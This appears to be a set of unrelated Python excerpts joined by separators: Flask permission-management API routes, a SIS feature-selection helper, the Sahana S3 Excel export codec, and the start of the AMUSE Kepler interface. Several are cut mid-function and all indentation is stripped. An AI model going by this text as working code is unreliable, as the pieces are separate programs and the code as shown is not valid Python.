@api_blueprint.route('/editor/<uuid>/versions', methods=['GET'])
@require_api_auth()
def get_editor_source_versions(uuid):
try:
# listar las versiones de este editor que no se han revisado para que pueda cambiarlas
source = SourceRecord.get_record(uuid)
# print('source> ', source)
if not source:
raise Exception('Not source found')
if source.user_has_edit_permission(current_user):
versions = source.get_editor_versions_not_reviewed()
return iroko_json_response(
IrokoResponseStatus.SUCCESS, \
'ok', 'source', \
{
'data': source,
'versions': source_version_schema_many.dump(versions),
'count': 1
}
)
except PermissionDenied as err:
msg = 'Permission denied for changing source'
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
def _get_sources_stats(org_id, offset):
# TODO:
# 1- obtener de cuor, la organizacion con los hijos.
# result = dict()
# result['id'] = 'orgID'
# 2- por cada uno de los hijos de la organizacion
# por ahora esta bien asi
# print("************************** START get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
search = SourceSearch()
org = dict()
if org_id:
org = CuorHelper.query_cuor_by_uuid(org_id)
# print('******************* ORG *******************',org)
if not org or 'metadata' not in org:
org_id = None
org = {}
# raise Exception('Organization with ID: {0} not found'.format(org_id))
if org_id:
search = search.filter('term', organizations__id=org_id)
bucket_org = A('terms', field='organizations.id', size=999999)
search.aggs.bucket('orgs', bucket_org)
# print("************************** CUOR REQUEST get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
# classification bucket
# subjects
# vocab = Vocabulary.query.filter_by(
# identifier=IrokoVocabularyIdentifiers.SUBJECTS.value).first()
subjects_terms = Term.query.filter_by(
vocabulary_id=IrokoVocabularyIdentifiers.SUBJECTS.value,
parent_id=None
).all()
subjects = term_schema_many.dump(
subjects_terms
) # erm_node_schema.dump_term_node_list(subjects_terms, 0, 0)
# indexes
# vocab = Vocabulary.query.filter_by(
# identifier=IrokoVocabularyIdentifiers.INDEXES.value).first()
indexes_terms = Term.query.filter_by(
vocabulary_id=IrokoVocabularyIdentifiers.INDEXES.value,
parent_id=None
).all()
indexes = term_schema_many.dump(
indexes_terms
) # term_node_schema.dump_term_node_list(indexes_terms, 0, 0)
# bucket
bucket_classifications = A('terms', field='classifications.id', size=999999)
search.aggs.bucket('classifications', bucket_classifications)
# source_type bucket
source_types = []
for k in SourceType:
source_types.append(
{
'source_type': k.value
}
)
# print(k.value, '*****')
bucket_source_type = A('terms', field='source_type', size=999999)
search.aggs.bucket('source_type', bucket_source_type)
# print("************************** SEARCH EXEC get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
search.sort('_save_info_updated')
response = search[0:offset].execute()
hits = []
for hit in response.hits:
hits.append(
{
'id': hit['id'],
'name': hit['name']
}
)
# print("************************** MI COSA get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
if org_id:
org['metadata']['source_count'] = search.count()
for item in response.aggregations.orgs.buckets:
# print('****** org ******', item.doc_count, item.key)
CuorHelper.append_key_value_to_relationship(
org, item.key, 'child', 'source_count', item.doc_count
)
for item in response.aggregations.classifications.buckets:
# print('****** class ******', item.doc_count, item.key)
for term in subjects:
# print('************ term ', term['uuid'])
if str(term['uuid']) == item.key:
term['source_count'] = item.doc_count
for term in indexes:
# print('************ term ', term['uuid'])
if str(term['uuid']) == item.key:
term['source_count'] = item.doc_count
for item in response.aggregations.source_type.buckets:
for t in source_types:
if t['source_type'] == item.key:
t['source_count'] = item.doc_count
# print("************************** END get aggr {0}".format(datetime.datetime.now(
# ).strftime("%H:%M:%S")))
result = {
'sources_count': search.count(),
'last_sources': hits,
'org': org,
'subjects': subjects,
'indexes': indexes,
'source_types': source_types
}
return result
@api_blueprint.route('/stats', methods=['GET'])
def get_sources_stats():
"""
"""
try:
offset = request.args.get('offset') if request.args.get('offset') else 3
# top organization bucket
org_id = request.args.get('org') if request.args.get('org') else None
cache = current_cache.get("get_sources_stats:{0}{1}".format(org_id, offset)) or {}
if "date" not in cache:
cache["date"] = datetime.datetime.now()
if datetime.datetime.now() - cache["date"] < datetime.timedelta(
seconds=300
) and "stats" in cache:
print(datetime.datetime.now())
print(cache["date"])
print(datetime.datetime.now() - cache["date"])
print(datetime.timedelta(seconds=300))
print("USING CACHE STATS")
result = cache["stats"]
return iroko_json_response(IrokoResponseStatus.SUCCESS, 'ok', 'aggr', result)
else:
result = _get_sources_stats(org_id, offset)
cache["date"] = datetime.datetime.now()
cache["stats"] = result
current_cache.set("get_sources_stats:{0}{1}".format(org_id, offset), cache, timeout=-1)
return iroko_json_response(IrokoResponseStatus.SUCCESS, 'ok', 'aggr', result)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/editor/<uuid>/users', methods=['GET'])
@require_api_auth()
def get_users_source_editor(uuid):
"""
get the lists of user with permission of editor and manager
:param uuid: source uuid
:return:
"""
try:
source = SourceRecord.get_record(uuid)
if not source:
raise Exception('Not source found')
if source.user_has_manager_permission(current_user):
ids = get_user_ids_for_source_from_action('source_editor_actions', uuid)
users = User.query.filter(User.id.in_(ids)).all()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'permission',
{
'action': 'editor',
'source': uuid,
'users': user_schema_many.dump(users)
}
)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/manager/<uuid>/users', methods=['GET'])
@require_api_auth()
def get_users_source_manager(uuid):
"""
get the lists of user with permission of editor and manager
:param uuid: source uuid
:return:
"""
try:
source = SourceRecord.get_record(uuid)
if not source:
raise Exception('Not source found')
if source.user_has_manager_permission(current_user):
ids = get_user_ids_for_source_from_action('source_manager_actions', uuid)
users = User.query.filter(User.id.in_(ids)).all()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'permission',
{
'action': 'manager',
'source': uuid,
'users': user_schema_many.dump(users)
}
)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/organization/<uuid>/users', methods=['GET'])
@require_api_auth()
def get_users_organization(uuid):
"""
get the list of user with permission of organization manager
:param uuid: organization uuid
:return:
"""
try:
org = CuorHelper.query_cuor_by_uuid(uuid)
if not org:
raise Exception('Organization not found')
if is_user_sources_admin(current_user) or \
user_is_organization_manager(org['id'], current_user):
ids = get_user_ids_for_source_from_action('source_organization_manager_actions', uuid)
users = User.query.filter(User.id.in_(ids)).all()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'permission',
{
'action': 'manager',
'organization': uuid,
'users': user_schema_many.dump(users)
}
)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/term/<uuid>/users', methods=['GET'])
@require_api_auth()
def get_users_term(uuid):
"""
get the lists of user with permission of term manager
:param uuid: term uuid
:return:
"""
try:
term = Term.query.filter_by(uuid=uuid).first()
if not term:
raise Exception('Term not found')
if is_user_sources_admin(current_user) or \
user_is_term_manager(term.uuid, current_user):
ids = get_user_ids_for_source_from_action('source_term_manager_actions', uuid)
users = User.query.filter(User.id.in_(ids)).all()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'permission',
{
'action': 'manager',
'term': uuid,
'users': user_schema_many.dump(users)
}
)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/<user>/editor/<uuid>/allow', methods=['POST'])
@require_api_auth()
def set_source_editor_allow(user, uuid):
return set_source_editor(user, uuid, True)
@api_blueprint.route('/permission/<user>/editor/<uuid>/deny', methods=['POST'])
@require_api_auth()
def set_source_editor_deny(user, uuid):
return set_source_editor(user, uuid, False)
def set_source_editor(user, uuid, allow=False):
"""
Set user as editor of a source
:param uuid: source uuid
:param user: user id
:param allow: if allow or deny
:return:
"""
try:
offset = request.args.get('offset') if request.args.get('offset') else 3
source = SourceRecord.get_record(uuid)
if not source:
raise Exception('Not source found')
userObj = User.query.filter_by(id=user).first()
if not userObj:
raise Exception('User not found')
if source.user_has_manager_permission(current_user):
with db.session.begin_nested():
ActionUsers.query.filter_by(
user_id=user, action='source_editor_actions',
argument=uuid
).delete()
if allow:
db.session.add(ActionUsers.allow(ObjectSourceEditor(uuid), user=userObj))
else:
db.session.add(ActionUsers.deny(ObjectSourceEditor(uuid), user=userObj))
db.session.commit()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok', 'permission',
{
'source': uuid,
'user': user,
'permission': 'editor',
'allow': allow
}
)
raise PermissionDenied()
except PermissionDenied as err:
msg = 'Permission denied'
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/<user>/manager/<uuid>/allow', methods=['POST'])
@require_api_auth()
def set_source_manager_allow(user, uuid):
return set_source_manager(user, uuid, True)
@api_blueprint.route('/permission/<user>/manager/<uuid>/deny', methods=['POST'])
@require_api_auth()
def set_source_manager_deny(user, uuid):
return set_source_manager(user, uuid, False)
def set_source_manager(user, uuid, allow=False):
"""
Set user as manager of a source
:param uuid: source uuid
:param user: user id
:param allow: if allow or deny
:return:
"""
try:
source = SourceRecord.get_record(uuid)
if not source:
raise Exception('Not source found')
userObj = User.query.filter_by(id=user).first()
if not userObj:
raise Exception('User not found')
if source.user_has_manager_permission(current_user):
with db.session.begin_nested():
ActionUsers.query.filter_by(
user_id=user, action='source_manager_actions',
argument=uuid
).delete()
if allow:
db.session.add(ActionUsers.allow(ObjectSourceManager(uuid), user=userObj))
else:
db.session.add(ActionUsers.deny(ObjectSourceManager(uuid), user=userObj))
db.session.commit()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok', 'permission',
{
'term': uuid,
'user': user,
'permission': 'manager',
'allow': allow
}
)
raise PermissionDenied()
except PermissionDenied as err:
msg = 'Permission denied'
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/<user>/organization/<uuid>/allow', methods=['POST'])
@require_api_auth()
def set_organization_manager_allow(user, uuid):
return set_organization_manager(user, uuid, True)
@api_blueprint.route('/permission/<user>/organization/<uuid>/deny', methods=['POST'])
@require_api_auth()
def set_organization_manager_deny(user, uuid):
return set_organization_manager(user, uuid, False)
def set_organization_manager(user, uuid, allow=False):
"""
Set user as manager of a organization
:param uuid: organization or term uuid
:param user: user id
:param allow: if allow or deny
:return:
"""
try:
userObj = User.query.filter_by(id=user).first()
if not userObj:
raise Exception('User not found')
org = CuorHelper.query_cuor_by_uuid(uuid)
if not org:
raise Exception('Organization not found')
parents = CuorHelper.get_relationships_parent(org)
print(parents)
allow_parent = False
for p in parents:
try:
allow_parent = user_is_organization_manager(p['id'], current_user)
except PermissionDenied:
pass
if is_user_sources_admin(current_user) or \
allow_parent or \
user_is_organization_manager(org['id'], current_user):
with db.session.begin_nested():
ActionUsers.query.filter_by(
user_id=user, action='source_organization_manager_actions',
argument=uuid
).delete()
if allow:
db.session.add(
ActionUsers.allow(ObjectSourceOrganizationManager(uuid), user=userObj)
)
else:
db.session.add(
ActionUsers.deny(ObjectSourceOrganizationManager(uuid), user=userObj)
)
db.session.commit()
return iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok', 'permission',
{
'org': uuid,
'user': user,
'permission': 'manager',
'allow': allow
}
)
raise PermissionDenied()
except PermissionDenied as err:
msg = 'Permission denied'
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
except Exception as e:
return iroko_json_response(IrokoResponseStatus.ERROR, str(e), None, None)
@api_blueprint.route('/permission/<user>/term/<uuid>/allow', methods=['POST'])
@require_api_auth()
def set_term_manager_allow(user, uuid):
return set_term_manager(user, uuid, True)
@api_blueprint.route('/permission/<user>/term/<uuid>/deny', methods=['POST'])
@require_api_auth()
def set_term_manager_deny(user, uuid):
return set_term_manager(user, uuid, False)
def set_term_manager(user, uuid, allow=False):
"""
Set user as manager of a organization
:param uuid: | |
# k-fold CV (>=2)
self.parameters['CV_repeat'] = 1 # repeated k-fold CV
self.parameters['n_out'] = 100 # number of top models to be output, off when =0
# overwrite parameter values if specified in advanced_parameters
if not advanced_parameters is None:
for key, value in advanced_parameters.iteritems():
self.parameters[key] = value
# END INIT
def start(self):
""" Attribute which starts the calculations after init. """
# Check if folders exists. If yes delete (if self.rm_existing_files)
# or rename it to self.SIS_input_path_old_#
if os.path.isdir(self.SIS_input_path):
self.logger.warning('Directory %s already exists.' % self.SIS_input_path)
if self.rm_existing_files:
rmtree(self.SIS_input_path)
self.logger.warning('It is removed.')
else:
for i in range(1000):
old_name = "%s_old_%s" % (self.SIS_input_path, i)
if not os.path.isdir(old_name):
os.rename(self.SIS_input_path, old_name)
break
self.logger.warning('It is renamed to %s.' % old_name)
# creat input folder on local machine
os.mkdir(self.SIS_input_path)
# write input files in inputfolder
self.write_P_D(self.P, self.D, self.feature_list)
self.write_parameters()
# decide if calculation on local or remote machine
if self.ssh_connection:
self.do_transfer(ssh=self.ssh, eos=self.eos, username=self.username, CPUs=self.CPUs)
else:
# calculate on local machine. (At the moment not clear if python blocks parallel computing)
os.chdir(self.SIS_input_path)
Popen(self.SIS_code_FCDI).wait()
def set_logger(self, output_log_file):
""" Set logger for outputs as errors, warnings, infos. """
self.logger = logging.getLogger(__name__)
hdlr = logging.FileHandler(output_log_file)
self.logger.setLevel(logging.INFO)
logging.basicConfig(level=logging.INFO)
FORMAT = "%(levelname)s: %(message)s"
formatter = logging.Formatter(fmt=FORMAT)
handler = logging.StreamHandler()
handler.setFormatter(formatter)
hdlr.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.addHandler(hdlr)
self.logger.setLevel(logging.INFO)
self.logger.propagate = False
# START ckecking functions before calculations
def check_arrays(self, P_in, D, feature_list, feature_unit_classes, ptype):
""" Check arrays/list P, D and feature_list"""
P, D, feature_list = np.array(P_in), np.array(D), np.array(feature_list)
P_shape, D_shape, f_shape = P.shape, D.shape, feature_list.shape
if not len(D_shape) == 2:
self.logger.error(
'Dimension of feature matrix is %s. A two-dimensional list or array is needed.' %
len(D_shape))
sys.exit(1)
if not len(f_shape) == 1:
self.logger.error(
'Dimension of feature list is %s. A one-dimensional list or array is needed.' %
len(f_shape))
sys.exit(1)
if not P_shape[0] == D_shape[0]:
self.logger.error(
"Length (%s) of target property has to match to number of rows (%s) of feature matrix." %
(P_shape[0], D_shape[0]))
sys.exit(1)
if ptype == 'quanti':
if not all(isinstance(el, (float, int)) for el in P):
self.logger.error("For ptype = 'quanti', a 1-dimensional array of floats/ints is required is required.")
sys.exit(1)
if ptype == 'quali':
if not all(isinstance(el, int) for el in P_in):
self.logger.error("For ptype = 'quali', a 1-dimensional array of ints is required is required.")
sys.exit(1)
index = np.unique(P, return_index=True)[1]
class_names = P[np.sort(index)]
n_class = len(class_names)
current_i = 0
for p in P:
if not p == class_names[current_i]:
current_i += 1
if n_class == current_i:
self.logger.error("For ptype = 'quali', the target property has to be ordered by classes:")
self.logger.error("first all members of the first class, next all members of the next class ...")
sys.exit(1)
if not D_shape[1] == f_shape[0]:
self.logger.error(
'Length (%s) of feature_list has to match to number of columns (%s) of feature matrix.' %
(f_shape[0], D_shape[1]))
sys.exit(1)
if f_shape[0] < 2:
self.logger.error('Length of feature_list is %s. Choose at least two features.' % f_shape[0])
sys.exit(1)
if not isinstance(feature_unit_classes, (np.ndarray, list, type(None))):
raise TypeError("'feature_unit_classes' must be numpy array, list or None.")
if isinstance(feature_unit_classes, (np.ndarray, list)) and f_shape[0] != len(feature_unit_classes):
self.logger.error('Length of feature_unit_classes does not match length of feature_list.')
sys.exit(1)
feature_unit_classes_integers = [f for f in feature_unit_classes if isinstance(f, int)]
feature_unit_classes_strings = [f for f in feature_unit_classes if isinstance(f, str)]
if isinstance(feature_unit_classes, (np.ndarray, list)) and (not all(isinstance(f_c, int)
for f_c in feature_unit_classes_integers) or not all(f_c == 'no_unit' for f_c in feature_unit_classes_strings)):
raise TypeError("'feature_unit_classes' must consist of integers or the string 'no_unit', where each integer stands for the unit of a feature, i.e. 1:eV, 2:Angstrom. 'no_unit' is reserved for dimensionless unit.")
def check_control(self, par_in, par_ref, par_in_path):
""" Recursive Function to check input control dict tree.
If for example check_control(control,control_ref,'control')
function goes through dcit tree control and compares with control_ref
if correct keys (mandotory, not_mandotory, typos of key string) are set
and if values are of correct type or of optional list.
Furthermore it gives Errors with hints what is wrong, and what is needed.
Parameters
----------
par_in : any key
if par_in is dict, then recursion.
par_ref: any key
Is compared to par_in, if of same time.
If par_in and par_key are dict, alse keys are compared.
par_in_path: string
Gives the dict tree path where, when error occurs, e.g.
control[key_1][key_2]... For using function from outside
start with name of input dict, e.g. 'control'
"""
# check if value_in has correct type = value_ref_type
self.check_type(par_in, par_ref, par_in_path)
if isinstance(par_in, dict):
# check if correct keys are used
self.check_keys(par_in, par_ref, par_in_path)
for key_in, value_in in par_in.iteritems():
# get reference value like: dictionary[key_1][key_2] or here: par_ref[key_in]
# Needed because control_ref has special form.
value_ref = self.get_value_from_dic(par_ref, [key_in])
# recursion
self.check_control(value_in, value_ref, par_in_path + "['%s']" % key_in)
def get_type(self, value):
if isinstance(value, type):
return value
else:
return type(value)
def check_type(self, par_in, par_ref, par_in_path, if_also_none=False):
""" Check type of par_in and par_ref.
If par_ref is tuple, par_in must be item of par_ref:
else: they must have same type.
"""
# if par_ref is tuple, then only a few values are allowed. Thus just checked if
# par_in is in par_ref instead of checking type.
if isinstance(par_ref, tuple):
if not par_in in par_ref:
self.logger.error('%s must be in %s.' % (par_in_path, par_ref))
sys.exit(1)
# check if type(par_in) = type(par_ref)
else:
# get type of par_ref. type(par_ref) is not enough, since in control_ref
# strings,integers,dictionaries... AND types as <int>, <dict>, <str> are given.
ref_type = self.get_type(par_ref)
if not isinstance(par_in, ref_type):
if if_also_none and par_in is None:
pass
else:
self.logger.error('%s must be %s.' % (par_in_path, ref_type))
sys.exit(1)
def get_value_from_dic(self, dictionary, key_tree_path):
""" Returns value of the dict tree
Parameters
----------
dictionary: dict or 'dict tree' as control_ref
dict_tree is when key is tuple of keys and value is tuple of
corresponding values.
key_tree_path: list of keys
Must be in the correct order beginning from the top of the tree/dict.
# Examples
# --------
# >>> print get_value_from_dic[control_ref, ['local_run','SIS_code_path']]
# <type 'str'>
"""
value_ref = dictionary
for key in key_tree_path:
value_ref_keys = value_ref.keys()
if key in value_ref_keys:
value_ref = value_ref[key]
else:
tuples = [tup for tup in value_ref_keys if isinstance(tup, tuple)]
try:
select_tuple = [tup for tup in tuples if key in tup][0]
except BaseException:
raise KeyError
index = [i for i, key_tuple in enumerate(select_tuple) if key == key_tuple][0]
value_ref = value_ref[select_tuple][index]
return value_ref
def check_keys(self, par_in, par_ref, par_in_path):
""" Compares the dicts par_in and par_ref.
Collects which keys are missing (only if keys are not in not_mandotary) amd
whcih keys are not expected (if for example there is a typo).
If there are missing or not expected ones, error message with missing/not expected ones.
Parameters
----------
par_in : dict
par_ref : dict
par_in_path : string
Dictionary path string for error message, e.g 'control[key_1][key_2]'.
"""
keys_in, keys_ref = par_in.keys(), par_ref.keys()
# check if wrong keys are in keys_in
wrong_keys = [key for key in keys_in if not key in self.flatten(keys_ref)]
# check missing keys and if exactly one of optional keys is selected
missing_keys = []
for key in keys_ref:
if isinstance(key, tuple):
optional_in = [k for k in keys_in if k in key]
leng = len(optional_in)
if leng > 1:
self.logger.error("The following keys are set in %s: %s." % (par_in_path, optional_in))
self.logger.error("Please select only one of %s" % list(key))
sys.exit(1)
if leng == 0 and not key in not_mandotary:
missing_keys.append("--one of: (%s)" % (", ".join(["'%s'" % k for k in key])))
#missing_keys.append(('--one of:',)+key)
elif not key in keys_in and not key in not_mandotary:
missing_keys.append(key)
# error message if needed
len_wrong, len_missing = len(wrong_keys), len(missing_keys)
if len_wrong > 0 or len_missing > 0:
if len_wrong > 0:
self.logger.error("The following keys are not expected in %s: %s" % (par_in_path, wrong_keys))
if len_missing > 0:
self.logger.error("The following keys are missing in %s: %s" % (par_in_path, missing_keys))
sys.exit(1)
def check_OP_list(self, control):
""" Checks form and items of control['parameters']['OP_list'].
control['parameters']['OP_list'] must be a list of operations strings
or list of n_comb lists of operation strings. Furthermore if operation
strings are item of available_OPs | |
# -*- coding: utf-8 -*-
"""
S3 Microsoft Excel codec
@copyright: 2011-2021 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3XLS",
)
from io import BytesIO
from gluon import HTTP, current
from gluon.contenttype import contenttype
from gluon.storage import Storage
from ..s3codec import S3Codec
from ..s3utils import s3_str, s3_strip_markup, s3_get_foreign_key
# =============================================================================
class S3XLS(S3Codec):
"""
Simple Microsoft Excel format codec
"""
# The xlwt library supports a maximum of 182 characters in a single cell
MAX_CELL_SIZE = 182
# Customizable styles
COL_WIDTH_MULTIPLIER = 310
# Python xlwt Colours
# https://docs.google.com/spreadsheets/d/1ihNaZcUh7961yU7db1-Db0lbws4NT24B7koY8v8GHNQ/pubhtml?gid=1072579560&single=true
LARGE_HEADER_COLOUR = 0x2C # pale_blue
HEADER_COLOUR = 0x2C # pale_blue
SUB_HEADER_COLOUR = 0x18 # periwinkle
SUB_TOTALS_COLOUR = 0x96
TOTALS_COLOUR = 0x00
ROW_ALTERNATING_COLOURS = [0x2A, # light_green
0x2B, # light_yellow
]
ERROR = Storage(
XLRD_ERROR = "XLS export requires python-xlrd module to be installed on server",
XLWT_ERROR = "XLS export requires python-xlwt module to be installed on server",
)
# -------------------------------------------------------------------------
def extract(self, resource, list_fields):
"""
Extract the rows from the resource
@param resource: the resource
@param list_fields: fields to include in list views
"""
title = self.crud_string(resource.tablename, "title_list")
get_vars = dict(current.request.vars)
get_vars["iColumns"] = len(list_fields)
query, orderby, left = resource.datatable_filter(list_fields,
get_vars,
)
resource.add_filter(query)
if orderby is None:
orderby = resource.get_config("orderby")
# Hierarchical FK Expansion:
# setting = {field_selector: [LevelLabel, LevelLabel, ...]}
expand_hierarchy = resource.get_config("xls_expand_hierarchy")
data = resource.select(list_fields,
left = left,
limit = None,
count = True,
getids = True,
orderby = orderby,
represent = True,
show_links = False,
raw_data = True if expand_hierarchy else False,
)
rfields = data.rfields
rows = data.rows
types = []
lfields = []
heading = {}
for rfield in rfields:
if rfield.show:
if expand_hierarchy:
levels = expand_hierarchy.get(rfield.selector)
else:
levels = None
if levels:
num_levels = len(levels)
colnames = self.expand_hierarchy(rfield, num_levels, rows)
lfields.extend(colnames)
types.extend(["string"] * num_levels)
T = current.T
for i, colname in enumerate(colnames):
heading[colname] = T(levels[i])
else:
lfields.append(rfield.colname)
heading[rfield.colname] = rfield.label or \
rfield.field.name.capitalize().replace("_", " ")
if rfield.ftype == "virtual":
types.append("string")
else:
types.append(rfield.ftype)
return (title, types, lfields, heading, rows)
# -------------------------------------------------------------------------
def encode(self, resource, **attr):
"""
Export data as a Microsoft Excel spreadsheet
@param resource: the source of the data that is to be encoded
as a spreadsheet, can be either of:
1) an S3Resource
2) an array of value dicts (dict of
column labels as first item, list of
field types as second item)
3) a dict like:
{columns: [key, ...],
headers: {key: label},
types: {key: type},
rows: [{key:value}],
}
@param attr: keyword arguments (see below)
@keyword as_stream: return the buffer (BytesIO) rather than
its contents (str), useful when the output
is supposed to be stored locally
@keyword title: the main title of the report
@keyword list_fields: fields to include in list views
@keyword report_groupby: used to create a grouping of the result:
either a Field object of the resource
or a string which matches a value in
the heading
@keyword use_colour: True to add colour to the cells, default False
@keyword evenodd: render different background colours
for even/odd rows ("stripes")
"""
# Do not redirect from here!
# ...but raise proper status code, which can be caught by caller
try:
import xlwt
except ImportError:
error = self.ERROR.XLWT_ERROR
current.log.error(error)
raise HTTP(503, body=error)
try:
from xlrd.xldate import xldate_from_date_tuple, \
xldate_from_time_tuple, \
xldate_from_datetime_tuple
except ImportError:
error = self.ERROR.XLRD_ERROR
current.log.error(error)
raise HTTP(503, body=error)
import datetime
MAX_CELL_SIZE = self.MAX_CELL_SIZE
COL_WIDTH_MULTIPLIER = self.COL_WIDTH_MULTIPLIER
# Get the attributes
attr_get = attr.get
title = attr_get("title")
if title is None:
title = current.T("Report")
list_fields = attr_get("list_fields")
group = attr_get("dt_group")
use_colour = attr_get("use_colour", False)
evenodd = attr_get("evenodd", True)
# Extract the data from the resource
if isinstance(resource, dict):
headers = resource.get("headers", {})
lfields = resource.get("columns", list_fields)
column_types = resource.get("types")
types = [column_types[col] for col in lfields]
rows = resource.get("rows")
elif isinstance(resource, (list, tuple)):
headers = resource[0]
types = resource[1]
rows = resource[2:]
lfields = list_fields
else:
if not list_fields:
list_fields = resource.list_fields()
(title, types, lfields, headers, rows) = self.extract(resource,
list_fields,
)
# Verify columns in items
request = current.request
if len(rows) > 0 and len(lfields) > len(rows[0]):
msg = """modules/s3/codecs/xls: There is an error in the list items, a field doesn't exist
requesting url %s
Headers = %d, Data Items = %d
Headers %s
List Fields %s""" % (request.url, len(lfields), len(rows[0]), headers, lfields)
current.log.error(msg)
# Grouping
report_groupby = lfields[group] if group else None
groupby_label = headers[report_groupby] if report_groupby else None
# Date/Time formats from L10N deployment settings
settings = current.deployment_settings
date_format = settings.get_L10n_date_format()
date_format_str = str(date_format)
dt_format_translate = self.dt_format_translate
date_format = dt_format_translate(date_format)
time_format = dt_format_translate(settings.get_L10n_time_format())
datetime_format = dt_format_translate(settings.get_L10n_datetime_format())
title_row = settings.get_xls_title_row()
# Get styles
styles = self._styles(use_colour = use_colour,
evenodd = evenodd,
datetime_format = datetime_format,
)
# Create the workbook
book = xlwt.Workbook(encoding = "utf-8")
# Add sheets
sheets = []
# XLS exports are limited to 65536 rows per sheet, we bypass
# this by creating multiple sheets
row_limit = 65536
sheetnum = len(rows) / row_limit
# Can't have a / in the sheet_name, so replace any with a space
sheet_name = s3_str(title.replace("/", " "))
if len(sheet_name) > 28:
# Sheet name cannot be over 31 chars
# (take sheet number suffix into account)
sheet_name = sheet_name[:28]
count = 1
while len(sheets) <= sheetnum:
sheets.append(book.add_sheet("%s-%s" % (sheet_name, count)))
count += 1
if callable(title_row):
# Calling with sheet None to get the number of title rows
title_row_length = title_row(None)
else:
title_row_length = 2
# Add header row to all sheets, determine columns widths
header_style = styles["header"]
for sheet in sheets:
# Move this down if a title row will be added
if title_row:
header_row = sheet.row(title_row_length)
else:
header_row = sheet.row(0)
column_widths = []
has_id = False
col_index = 0
for selector in lfields:
if selector == report_groupby:
continue
label = headers[selector]
if label == "Id":
# Indicate to adjust col_index when writing out
has_id = True
column_widths.append(0)
col_index += 1
continue
if label == "Sort":
continue
if has_id:
# Adjust for the skipped column
write_col_index = col_index - 1
else:
write_col_index = col_index
header_row.write(write_col_index, str(label), header_style)
width = max(len(label) * COL_WIDTH_MULTIPLIER, 2000)
width = min(width, 65535) # USHRT_MAX
column_widths.append(width)
sheet.col(write_col_index).width = width
col_index += 1
title = s3_str(title)
# Title row (optional, deployment setting)
if title_row:
T = current.T
large_header_style = styles["large_header"]
notes_style = styles["notes"]
for sheet in sheets:
if callable(title_row):
# Custom title rows
title_row(sheet)
else:
# First row => Title (standard = "title_list" CRUD string)
current_row = sheet.row(0)
if col_index > 0:
sheet.write_merge(0, 0, 0, col_index,
title,
large_header_style,
)
current_row.height = 500
# Second row => Export date/time
current_row = sheet.row(1)
current_row.write(0, "%s:" % T("Date Exported"), notes_style)
current_row.write(1, request.now, notes_style)
# Fix the size of the last column to display the date
if 16 * COL_WIDTH_MULTIPLIER > width:
sheet.col(col_index).width = 16 * COL_WIDTH_MULTIPLIER
# Initialize counters
total_cols = col_index
# Move the rows down if a title row is included
if title_row:
row_index = title_row_length
else:
row_index = 0
# Helper function to get the current row
def get_current_row(row_count, row_limit):
sheet_count = int(row_count / row_limit)
| |
<filename>src/amuse/community/kepler/interface.py
from amuse.community import *
from amuse.community.interface.common import CommonCodeInterface, CommonCode
from amuse.support.options import option
from amuse.units import units
import os.path
class KeplerInterface(CodeInterface,
CommonCodeInterface):
"""
Kepler orbit manipulation functions, imported from Starlab.
Initialize an orbit from mass, pos, and vel, or mass, semi-major
axis and eccentricity, and allow the user to manipulate the
resulting structure. Most Starlab functionality is currently
exposed.
"""
# Interface specification.
include_headers = ['interface.h']
__so_module__ = 'kepler_cython'
def __init__(self, **options):
CodeInterface.__init__(self,
name_of_the_worker = "kepler_worker",
**options)
@legacy_function
def initialize_from_dyn():
"""
Initialize a new kepler system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('mass', dtype='float64', direction=function.IN,
unit = nbody_system.mass)
function.addParameter('x', dtype='float64', direction=function.IN,
unit = nbody_system.length)
